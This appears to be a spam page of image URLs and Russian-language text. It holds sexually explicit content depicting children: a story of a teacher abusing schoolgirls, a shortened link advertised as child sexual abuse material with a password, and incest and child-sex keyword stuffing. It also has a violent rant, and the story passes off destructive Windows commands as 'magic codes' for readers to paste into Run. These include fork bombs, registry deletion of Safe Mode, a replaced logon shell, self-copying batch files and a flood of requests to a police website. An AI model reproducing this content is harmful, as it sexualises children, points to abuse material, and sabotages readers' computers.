https://21.mvd.ru/upload/site24/cenfI9SD83-250x0.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE.jpg
https://21.mvd.ru/upload/site24/51f6287ae7df39d3aa3bba8357d4a0f3-65xx80.jpg

Kata

0

19

Tutogi

https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/Ika8wW6qZJ-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/D42VizJLjY.jpg
https://21.mvd.ru/upload/site24/document_images/mfWM0B7eAz.jpg
https://21.mvd.ru/upload/site24/document_images/HaiOOTAsmw.jpg
https://21.mvd.ru/upload/site24/document_images/Fm8qvLq2sM.jpg
https://21.mvd.ru/upload/site24/document_images/mVwetSgdfp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/35VN3ZQTAe-800x600.jpg
https://21.mvd.ru/upload/site24/9a7fc92270d6a4eaec4133917abb03e2-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/rO6jtZbMMF.jpg
https://21.mvd.ru/upload/site24/document_images/lo4aYJjMet-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/XJLNZ0LDXp-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq.jpg
https://21.mvd.ru/upload/site24/document_images/JqyC5c6SF9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0.jpg
https://21.mvd.ru/upload/site24/document_images/tDCr934g0n-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5vFNWMPcyd-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XulgaaNHCH-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5emlxNwqXb.jpg
https://21.mvd.ru/upload/site24/document_images/q8P4lTQ0Qn-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/P6ZEr2ovhf-308xx423.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VhrmYUhZi8.jpg
https://21.mvd.ru/upload/site24/document_images/q1Rz9N7dCe-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bVyvzkSbFP-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/A77DqXIRNc-88xx88.png
https://21.mvd.ru/upload/site24/document_images/sUQz7FsqVq.jpg
https://21.mvd.ru/upload/site24/document_images/lMbkyimrRa.jpg
https://21.mvd.ru/upload/site24/document_images/6Oz5oRvhrg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/j1TVEdmyZQ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3rftbuMszl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/OfTfrq5CJA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fWnDr2Z8Dd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/lSTeXhMhbf.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MijtSZrny2.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6hIkaM5zdB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/20z9wpJ5iS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HaA51rI9eq-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Ka8UUKH76c-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1DLgDOSM8F-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/WX0xO7UDeS-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/lSTeXhMhbf-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/deJNmnavsH-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/occvLQxJLa-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/piLdKR7iqi-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ubO0D0Wf7n.jpg
https://21.mvd.ru/upload/site24/document_images/kc2Mt6Q6KM.jpg
https://21.mvd.ru/upload/site24/document_images/zDnlJlxWe0.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nIcfVA0uJZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/LYvzoIUkqN-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/OCPVEdStvg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BeNsx0Ww5M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yNgGHYCNfC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Jq3EnB7cGA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/FJhONRG8uU.jpg
https://21.mvd.ru/upload/site24/document_video/image/QyXjZGM6qQ-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/BtgqGc6uMk.jpg
https://21.mvd.ru/upload/site24/document_images/GKRdMKXBiB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/IHeL04WW4M-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MNfvcUKifU.jpg
https://21.mvd.ru/upload/site24/document_images/Fm8qvLq2sM-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/zxlzDcaYac-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/wQHHH9Zvv6.jpg
https://21.mvd.ru/upload/site24/document_images/9SgtK2izJ2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lvOBO0EvcK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/j5F3vsDGul-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK.jpg
https://21.mvd.ru/upload/site24/document_images/mfWM0B7eAz-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/32WBHOoMzI.jpg
https://21.mvd.ru/upload/site24/document_images/JP9rmZlj2A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rilCQKX2cD-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/tDCr934g0n.jpg
https://21.mvd.ru/upload/site24/document_video/image/sFYXjPjlKl-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/JvV1Z3MOj7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/G14JEB4j3k-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mVwetSgdfp-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/GFTZHRnvKr.jpg
https://21.mvd.ru/upload/site24/document_images/yhohIcHl6y-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/j5F3vsDGul-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/mnmnKUF7ls-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/mC56ft65tr-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/rO6jtZbMMF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/UkzBjtkXOq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/poz1XH4Wvu.jpg
https://21.mvd.ru/upload/site24/document_remember/5rMEGNCvBq-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/sj0jgKUPL8-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/vONjVBId7B-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3UIJHH2ITV.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG.jpg
https://21.mvd.ru/upload/site24/document_images/Z3bpVZaaei-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/QqtFdt4YjN-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Gn97fwvYTb-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/uDEFGBGuWL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD.jpg
https://21.mvd.ru/upload/site24/document_images/20z9wpJ5iS.jpg
https://21.mvd.ru/upload/site24/document_journal/Z24dWAsbT4-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Rjkug8Eatf-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7yPiupejRd-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ds72m8UdPG-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m9MAKkG6aY-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/IwhNFznLQW-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-800x600.jpg
https://21.mvd.ru/upload/site24/cd8c8b70b9aac6b431af85921398b914-65xx80.jpg
https://21.mvd.ru/upload/site24/7bdd661365d215b5826192631f7238e1-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7zX6oMPMKm-100xx100.jpg

Orevem

0

20

Ileci

Ебля маленьких девочек

В этом высере не будет раскрыта тема ебли маленьких девочек. Я считаю аморальным – писать про еблю маленьких девочек. Но с другой стороны, камрады, такая проблема существует. Очень многих в мире мразей мечтают о ебле маленьких девочек. Вот что бы ты сделал, если поблизости кто-то ебал бы маленьких девочек? Думаю, каждый со мной солидарен, отпиздил бы вусмерть проклятого нелюдя. Я скажу вам: надо уродов таких выявлять научным методом. Конечно же, мозг их не так устроен, раз думают про еблю маленьких девочек. Маньяков казнить на телевидении, (я б с удовольствием взглянул на это) чтоб знал даже младенец в пелёнках – нельзя ебать маленьких девочек! Ещё, я очень плохо думаю о такой хуйне, как пропаганда жестокости, секса, наркотиков и распиздяйства, почти как о ебле маленьких девочек.

Поверьте, мне очень сильно хочется открыть Ресурс ноябрьским вечером, и в каждом крео чтоб было побольше разумного, доброго, светлого, вечного. Поверьте, мне совсем не нравится читать истеричные высеры менеджеров, про то, как они блюют и бухают, про то, как их жёны за пиво лечат.

Особенно жуткое омерзение моё вызывают рассказы про извращения, наверное, кто-то всё это читает, а потом отдрачивает у себя потихоньку. Конечно, в реальности это сложно, так сделать, чтоб не писали больше про каннибализм с предельной жестокостью и красиво расписанную расчленёнку. Вот и приходится каждый вечер, только-только придя с работы, читать как пэтэушник маму выебал, насрал ей на сиськи и бросил в море, как чистят ебалы, как квасят водку, как хуй показывать в форточку ловко, как драть во все щели суку, которая вчера кандидатскую защитила. Особенно в последнее время радует, что стало гораздо меньше высеров, про то, как кто-то свой кал поедает, а также про еблю маленьких девочек.

А может, комрады, всем Ресурсом, всей сука нашей многотысячной массой, напишем письмо в город Освенцим, чтоб выслали срочно и гуманитарно лучшую печь для человекосжигания и посадить туда всех мутантов, что пишут про еблю маленьких девочек? Мне вот кажется, это реально. А я, пока суть да дело делается, конечно, праздно сидеть не буду. Ведь я - против ебли маленьких девочек, надену свой плащ и брожу повсюду. Но больше всего мне, ребята, нравится, особенно, в тёмное время суток, красться по узким тропинкам парка. Если только увижу, как кто-то будет ебать маленьких девочек, я ему перережу глотку острым ножиком, быстро и гладко.

А знаешь, что самое отвратительное в теме ебли маленьких девочек? Что тема ебли маленьких девочек просто пиздец как отвратительна!

Lolikon, Girls HC, CP https://tinyurl.com/oqkpyeo Pass: Pedolovers

Lifo

0

21

Afobo

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

Anov

0

22

пока мы с сестренкой трахались и я думал как бы соблазьнить тёщу Меня будут трахать как мою мамку принялся усердно трахать маму Коллектив МБОУДОД «Кугесьская ДШИ» Чебоксарского района ЧР Сказала Света садясь рядом с сестрой и беря её правый сосок между своих пальцев и начиная его массировать короче я была похожа на восемнадцатилетнюю девочку с маленькими сиськами и большим клитором, соблазнением детей своих на секс слегка раздвинула ножки и я вошел в мокрую и горячую пизду своей мамы.

